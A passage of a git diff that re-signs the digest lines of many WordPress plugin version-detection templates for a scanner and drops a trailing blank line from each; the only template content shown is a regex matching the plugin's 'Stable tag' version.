4b0a00483046022100a02b7dd01eaa70c19b9b933d1f892abb41e2e19ee6e9bce4249d3a1f46ee56db022100c41b9136b7228ba8c6b562bfe8ce92f90d54a857abcdc9ab9ada89afd67557c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2d5a569366f15f9ac1bbc2d94a4a4262a4ebf237aba881242ddc3975a87d400022100eb8b9a43aa4497a1d1abd5160c5073b2370f2e9edc953e989b0f3d376673887a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index a3372a7307..dc88c849a4 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022029e5dd7b659e77039a56766c51e9dbe1aac70d9799c33da06a0b8f25eab4d6d1022100b37da760b78d129b97f4eea78abff048f962e7cf14b3792cd0fe66250b5081e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d74af694f762fe0d1b71c344a05316e7703144d3711e983c75e1ae488cf64302022003d1eece3c0a78ba99d625f02c9e84f480242647d626c18411881241a3591507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 960004fe91..6d3838b398 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022075407a52ee0ef5123a7a5498e1d19ca2b15360f608bf6936d93521a7b6b31bb3022100b1d1a3d4a915748017200018fc6a9e360cace53474da4c35ddf37f3a549bef03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040b4c7e288ecc5098edaec29935c890a7ba6b7b044b44b4e545b7553002f0025022100f1b44a1c6be334175f67a38abd8294bab5f75b918f99f0d26736f71d00142213:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index c84df786a7..e09d4c96d6 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022012511801443f28fec24be44db1b89f4b1392553251c792d041031cf1c24b47ed022100d550ce5c07edc95cf7f9d95bf8b4bdce479130b6abe91932d927fc03fd7fd23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f487e280fc5c88c91d12ec2c8046549191eef0eeba616b7632069093bbe1b8b0220526cfc36a0c5a5cd49f40560bec208942c1ab0db5a254368680c0123ca598afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 1c33433d3f..8eb2fe79be 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022063053fbc4b2c3c082bb8eae26e2099dad12d536f492e54ac7dba756639a1c81402202fb03d6bdf69230dd8561a7e5d323ef789545eb0c1121323e7463b5582ef6442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e57c217abc18fea1f3f6e9cdb9485f9f4a27cdfe15c07755c0b4a2413d84377022100f0e7a1d4977145f2e8642d7ac8a932cc219c40e5a64a6a7f3ce3fd047b9bf742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index c3f679d833..305f9077af 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200d1ded23907de031d2169733a691e96ba786c42b9e43375847c63afa187b196f022100ba843b1052d602bcb83ec5f2c96db20567c91795b74465bf582a48dad0a82807:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039d3f7e22644c25f1daaeba4857ceb1ad822e48219b7ec954bbe951891e3ecbf022100f0b03bdad4dff3e29e07e9abea5a143eab122b4b427bd55fdce804d456fa8bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 81adf06fba..913c65af9b 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100be80834d54cd2183af2bbcd991bd6f945a6d19c8ec24d7ba67c2fa07de39151202203b3b87ec885cfef6183429c2b18fdab7b3f7b015761b1d4287d2fe2c323ae0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012834c7145dd13535b48f5994b98718cf77932a83ac74462b2ab1a5d3a4865af0220270ba9647069746f1391cea250f4fdad8f76de8622f81a1554a0ca3c1e067a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 6bda0c1a57..21721622b7 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aaaa1a1e08cd5b472875826efda03d21529e1b24d26130591e0fdc89f2e83c5c022100838796c7e1bf4a287aa91757d9a8beb39787ab5dad4dddd26b547cda7ef106f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005817915203d2e2b08d9c6ffeba37a5c63282f744b3e4a69d51d57265b95723e022017db5c445ccaf830c7803f783b368fe5b3d9df33c01f644fc6bcbdba0147a930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 946f460f7c..de6f5dda7f 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200b497bd58ac49f538125008aed98c2b8efaf254a01f796de952e2d105c7d1b75022006585551a0e574df103be548fb6b62428e5f0306276e3a1f51c657198f8b0b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f729fceeedc0bf5d6931f4cd3eaf70066f96f73fb7c0bb217920f92985f51de022100b5663f4e4002fb0b08f55ff9c801a7c95ef7ef26686080fedba655bb045028f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a70759ab7d..aa3f7ef3c8 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100832356b856189660ae8fff9ddedd1c3e79b1234ba99b9707b778d389249b734b02204a85058fd981bd62cfe090c94a5451551b5b63d8dbd0ca629ffc90473bb358c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220390a6f717fc6ccd733377542655707562dbc3ef4607b2dc70a3e9af27d419682022100cebee3f29a8aa6ecb362ab2aa3442378cd6498fe244d20ce12e8325c7709fc44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index b374d462a4..82fd1041e0 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220438394f3b94bdfcb77c6f465102ae8eabd3eb94d921ba2f1a7f6c67ea29dc58a0220597a6854d142740b3790b58689605b5d64b4de118cc0c1a1f27cffba8d6874a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af0af8d83434253a81739b0bbbfcfa1cdcb3ea0126ff01bd2c0bb1a75bfdef1b022100f1c47c399889c10f5ee6aedc213a681d962cb0acbff81e03b0dad17487ffad1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 485818301c..588af22f92 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f9a3b04bf2c7165d62997dbc668bae1f55e14914671b2f6a3d2b2e7f1e7da6c8022069989b07dab9c19b6697367299303046a9838e5ef3d44bb907566739abad4e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207858492ef712c6ac37539ea57e1b5fe591b8b7008ec3f59e359f920a1a36712202205896a5628f07dcba5f8062717f0ab0a1c50949775f1509d28bd63645a110605e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index c2edb8a2a4..5694a17235 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f3277faf5519dddee57255fbe57c4b5b2d129b7df6d8d5407b6318cbb5850e710220262be88e562f013b60d0ff7781b5416a59c2ee320f58c29350d6120404e8e4fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080d6915c63ab73d033b80cabc8f2a4c8da9ddef3affd8c0d7374e3fb2c6ab05d02205abe4aed154aeae7197e06712286c9d65cf7027d13c3ad2e75739f87a29a99d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index e55bb43e01..d87cacbffa 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a220fa8b1405e1a4dd9ef77fdb96326b2383fd4003093b5dfb380f285bcb255502210090265cb3197d62a99ee09d9ec29b7968efe054f687addf0901925c95c7027ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f6cac3c9b4ff74884c9277e4f02336610d7aa5a1a9cc1d819e4a05ebb82f6a1022033bdd9989764d8068803685d9c49717bf6d62f534e5c7a626c7cdb79c91498d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 299fdd4347..d45087d5ee 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022039acaa576687db76236bfc5bec017201c0f2253acaa198849a2c48982bb9e1aa022100a99d75a7b7fa2b225c02f464bec87df4da8cdb8139316437935db06b4ec0501e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201d51b198d4a448c1e662c47b7c57582a3f0684c52874a40cb128e3ee9300465b02207dfce9c7dd9bd6dda0576a047f745bc0f308d1a77b308647145070f80a9a4376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 1a2de778c5..7198eeed31 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220698e59e65830612e910c92751365a1500520945ebace64f7a627b4f8c89e700d02201de4594103adb7e4e643df18bc1495c976e7f2512263d7f4cd1fa2dd9d44b66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207db54d4b25071255413dbc366efb4deff83878e8a02739da8a04719ef2b0203c022100f68525b7b55b3036a6ea8ac16f47da33c62304cff7c8460a762ad3441777211d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index cc4e308932..334f2614f7 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202ce198bd8f5ad746a0e89e8b47cb0e4ea5c62bb4b63ce711bb8f5b0d25b1f185022100e7a9d36da46eb8deb7efa28431a10255391a7afa9fb62939a34cf77d5c92a6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0e0a40229feddc6ae7bbb29bbc6b16007ff46cefbd3ae8a0251493a74f27b89022100fe76f825651d08b6c7c4c24603e886ae0ad783cea55092d1dd79a0cf3d837d30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index b0e3bd24be..8741b72594 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200f8d1c5a03ac21d21b3a857d3ea2ee3588b4f452c14a8a67fd6d4812d7125281022016149251f8a4d8ea8df09c748ed7608aa8b593cafde5557ca03fe2c31345454f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d41f5e9ba43e14bdc7932a3f24ab4d3c213980239c6a710a801ebda9483a0da6022028bc8bd58554102ec7031498613e1bccb2f0bb55170743871364f721e5fa924d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 6eacb3c102..e5e0156321 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200bdafcab38ec934cce3116b8811980f828d58da9f8cd6e4a8ab538ac53385e38022100e4381097dcf715b144da5c0943cdb7a573ccc0ce13733ad1f7c14f16c9455c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c7f16c5b2eaa537fe7ed07230a4e1b86134f0518bc7cafe8e178bd2ab76c471022100ff83998bf3df91b8bba035d73c1ae03a6918b7896017bcf5bc938a8c3dcee93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 290febd7f3..ccb76df377 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204a5ddc29acdcef06cbfe40450fd20ba74081a5a39de9719beb63627981326967022100877e412c77a764a42ce2ccc2bb0fcf18f16c5e49178a33ea9cfeaa34cce84b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f656b3120005e7bac0ea16d590010a864b93d8b353cef94a60df5119977ba578022058c9208da42b51ecaf4d57c8e462a87259b7e8ae18f1fcb0df8ce76bc8722856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index b160469284..22963877c8 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022056c43bb108131227f5895dacc450f592878d3f3f7969b43b49f9404df9890bfe02207286e2e7a56b32596653e8111a12fa523933135fbc2bc3afc25ca40cbcfc6334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220624eea0ec41b9e91a807fbe2d272aa74077c8b05996d6fcf7f3b743013c3cc1b02202918d8b45d66d599e920d8c0335a527aac8acbdb2273a5b4983fdaa6681314f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 57b63e183e..c052c66ad9 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207726b162c7f8735234092d7169ace7e8095bdb35ffc17734c81fe8702fccecb1022012e1919c4e9b54f2abee5b3e069b0b26d0a7cac545347cb7812698c8b61d2401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b299812df7ccee94fdeb1b1507c3bba829f6c9e9991a79a2d94cdef9d87d331022062ef76c6c7591a52bc4f9e6cc9edc38a1eb22bde604830556d0c3e7e6e56b922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 009f991e73..18e1e5b303 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022063f89e8d33f47ef5a2b4c67639a6fb0b3db64a316a859fb90a04a8fd0d4111f402207c98f12fc808659d5a9516dbee1a49ca78d8a0e4cc1f7bb8d4de0f7b0b3f7a50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8cad3d98c96a3165cfe8307a28491aeb47572584c2972d11e88d042c3ce82b3022100f32964ceed3aa224ddc0156d190909129003bb2221f4f6176936c761177fc0eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index a1d7300e20..912a7fbb0f 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204145c8e72b4104ce799cfbb068dbe4f66cc4cc33a48f7a789de80af1bbc2868f0220266775a01da3e9a8616594ceeea0c5e7035dc94a1e372f7cc2b3c851e5de52d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201422bcc3dcaf578ce0cd2d69f29c3409fb916794b4101dc2178f0d89e1acfcef022060fdfa47c12266baa29fd74167b68b0decaf17f87a447e38fdfc26b5562bcb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index bb1ce000c4..154a5e4936 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d5d002af1a70a8c8bac97199d5283579c2ed63124d7cd7514d8a3b4abc62ef180221009df4c9a487564ffd899a8575bfdbb687db9a531d41b5b5433999a7f6cc7a6400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e7ab57a76f0b29e838a2144344772890e5aecbf97fe1d926aba6129c3bc2a838022100e8d6165cab53bf8a2e6fc5e224be1be0ecf9b3388043b60ad2500d19d9448d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index e85ba45625..2a7753a96f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f18a57d964a05ed72cbbbac45602a17aeb2e0d82f3c0a5618846a7060a2cc55c022100e12c045d19c602cae9cd8c32975fcc33a517313e29fa9da5fc7e35be177270e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d57c6cbbd9faa2564c16620b01b4494b3a7b60749921a317f0cd05ceb7ea72e9022000b3d637d2b51491ef162f04b4c6b4b117973b8add9951ccfdeb749980889e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3a8187ed10..9eae96c22b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202e3c06c6767dc59b7babb6cd56521578357d3b7c6012f988f56c00a5beff177702206a1befc9137c81caa289d489a9e36061a1db3e5fa9a938db6cabf039df72e4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c85ac893dc0fb83c537d8249e191e26e010893b5d591143acfb9d993614843102200d0ea9fa1a27a03b9bc381eefdfd638301cbbc235ea144f940b34dd259f4e6fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index ac13fb5d28..bc6e9dd487 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100867e2aeda75a8e857a61b7f0be26eeb43487d28698b3912bb32d0ab524f2462e022100a08d8c10ef373cdfe2d7d41b94900fa7d73c32cf5a9c9a2a945baf7c4c69f14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207adc5e5e1737475d9a831a5546e6e63968bb0c64b0998b99842b03e10230bc3e02203877817ef0ce18435d9442ed685a63b5c2baa28a8c60a393eed3fc4dc3c62859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index cde30ba89a..20fe255c00 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220237f9215bea3a91f60d903a858b2ad5748c4dadec5c78b042cac9fdfdc4d6b0502204ba9b7d90c114f6b81f6fdf229a6f2695b410dacd3a3c0daee49e864e43ec96d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049592287459468349a4c885175df03275c599874516d9461d2b7b4a6aa5a5d0c022100c387af15ecf82013a90a1bc0f80e28e414323b9ac5fb288092b1a0ea0cb56aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c47878e498..e52a93f220 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a47adaa9c631becce5d08537f9e7c2296925d381ae08c5cf4599d3c1920bfede022006c8d3faf213f01a829ca39f1a6e9d982c2f673b84656ee20770c9f3d2723c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc09f27fcc676069b878d3d7b5a7c9d52bfde2404838898f3d11847ce62897390220118b324e264d8f07d76c3f496e420a5276f842dbe177041ecbe68453d0154bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 0be0434c67..a1ceac5a06 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220342a6525844436a0bddaf4cb9c8e53117e7f9e8b7598a1bc4e1f384e6543597a02204a7a71ab4743ca766338369e09cd6344950875f51266055516eadcb9a6c67510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f1c50f9663ce3b89317160e1f26b34e2dfbdb3ca56ca9bbd3c1f98065948490022100af88c48e4c01ea4b658589fb2664a3a3208ee8df322e72305f334cce971ad53d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 34a0001f14..160ed767d2 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200e4a41ae6140a8a952a8c6cfed23bb266d5e30428d69295febb5494b1ead0221022100da7d652acb7486bc0e4be73bf1d83be3428180cc35ce225ad9e4d0c788b1b74a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087b69fa15e35c51cb65e67f9281135abcded8113be3923e530d9184607cfe4390220159c17ccaad8ce2c731f35038d818dc7fd8c992f9568b83661b6de72fa946de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 37d84c8842..31f3203681 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022073670af43335ac5bac56c3bab15d880561d16b5ec29eef7c3ce7b5de01b0bc6e02204465961388589279579916b3bdc42a23f42959db6c7e969e11cf143e434121e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fea305981282825f6498fb44ac71f258f8482fb6b7c1795b5b82afeac0a9324802204c214f876ab308560379af6c7da183ea271547aa227c360599f9203eaebd8776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index aeef804879..b2c82fb4d3 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206db4b33b04a13533039c21c7bc7bb23cd3102d80b96b0f5d0c194289c3248ba402200d415ba75571bd736e306da0b7ab1f47b426a578a434b69445256c45836251a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220307376db5b642d57cf1bd55a74890e833a980306494f71ec2111365f59338de002200785592641b90a08839d13b0d6b9cdd29a1fbdff0a0873e12c49309239759173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 